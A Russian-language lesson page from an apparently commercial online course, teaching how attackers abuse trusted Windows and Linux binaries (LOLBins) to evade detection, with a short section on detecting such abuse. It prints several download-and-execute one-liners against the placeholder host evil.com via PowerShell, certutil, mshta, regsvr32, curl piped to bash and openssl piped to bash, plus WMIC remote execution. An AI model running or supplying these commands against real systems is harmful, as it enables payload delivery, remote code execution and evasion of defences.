0Pricing
Cyber Security Academy · Урок

Бинарные файлы Living-Off-the-Land (LOLBins)

Используйте доверенные бинарные файлы Windows (certutil, mshta, regsvr32), чтобы обходить обнаружение.

«Бинарные файлы Living-Off-the-Land (LOLBins)» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 2 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.

Что такое LOLBins?

Легитимные системные двоичные файлы (LOLBins) — это легитимные двоичные файлы и инструменты ОС, которые злоумышленники переиспользуют для выполнения вредоносных действий. Поскольку это доверенные подписанные системные инструменты, они часто обходят белые списки приложений и снижают вероятность обнаружения средствами AV/EDR.

Почему LOLBins эффективны

Преимущества для злоумышленников:

  • Всегда присутствуют в целевых системах — не требуется размещать новые файлы
  • Подписаны Microsoft или Apple — обходят обнаружение на основе сигнатур
  • Пользуются доверием решений для создания белых списков приложений
  • Создают похожие на легитимные деревья процессов

PowerShell как LOLBin

PowerShell — наиболее часто используемый LOLBin. Злоумышленники используют его для:

# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

certutil

certutil.exe — средство Windows для работы с сертификатами, которое может загружать файлы:

# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exe

mshta и wscript

Выполнение скриптов через доверенные узлы:

# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.js

regsvr32 Squiblydoo

regsvr32.exe может загружать и выполнять DLL из удалённых URL с помощью флагов /s /n /u /i, обходя AppLocker и запуская неподписанный код в доверенном процессе:

regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll

Выполнение с помощью WMIC и WMI

Windows Management Instrumentation позволяет удалённо и локально выполнять код:

# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"

Rundll32

rundll32.exe загружает и выполняет точки входа DLL:

# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payload

LOLBins в Linux

Аналоги в Linux:

# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.io

LOLBAS и GTFOBins

Справочные базы:

  • LOLBAS (lolbas-project.github.io) — двоичные файлы, скрипты и библиотеки Windows
  • GTFOBins (gtfobins.github.io) — двоичные файлы Linux/macOS для эксплуатации, чтения и записи файлов, повышения привилегий через SUID

Обнаружение злоупотребления LOLBin

Стратегии обнаружения:

  • Журналирование блоков скриптов PowerShell (EventID 4104) — записывает декодированные команды
  • Sysmon EventID 1: создание процесса с цепочкой родительских процессов
  • Оповещения о неожиданных связях между родительским и дочерним процессами: Word → PowerShell, Excel → cmd
  • Сетевые соединения от certutil, mshta и powershell
  • Базовые профили UEBA для выявления аномального использования двоичных файлов

Быстрая проверка: LOLBins

Какой двоичный файл Windows может загрузить удалённый файл с помощью флага -urlcache?

Итоги урока

LOLBins — это легитимные инструменты ОС, переиспользуемые в вредоносных целях: PowerShell, certutil, mshta, regsvr32, rundll32 и WMIC в Windows; curl, python и openssl в Linux. Они обходят обнаружение на основе сигнатур и белые списки приложений. Для обнаружения требуются журналирование создания процессов (Sysmon), журналирование блоков скриптов PowerShell и поведенческие базовые профили. LOLBAS и GTFOBins — важнейшие справочные базы.

Часто задаваемые вопросы

Урок «Бинарные файлы Living-Off-the-Land (LOLBins)» бесплатный?

Да — полный текст урока «Бинарные файлы Living-Off-the-Land (LOLBins)» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.

Чему я научусь в уроке «Бинарные файлы Living-Off-the-Land (LOLBins)»?

Используйте доверенные бинарные файлы Windows (certutil, mshta, regsvr32), чтобы обходить обнаружение. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Cyber Security Academy?

Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 2 из 4.

Сколько времени занимает урок «Бинарные файлы Living-Off-the-Land (LOLBins)»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Cyber Security Academy?

Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Фреймворки C2: Cobalt Strike и Sliver
  2. Бинарные файлы Living-Off-the-Land (LOLBins)
  3. Методы горизонтального перемещения
  4. Составление отчётов красной команды
← Назад к Cyber Security Academy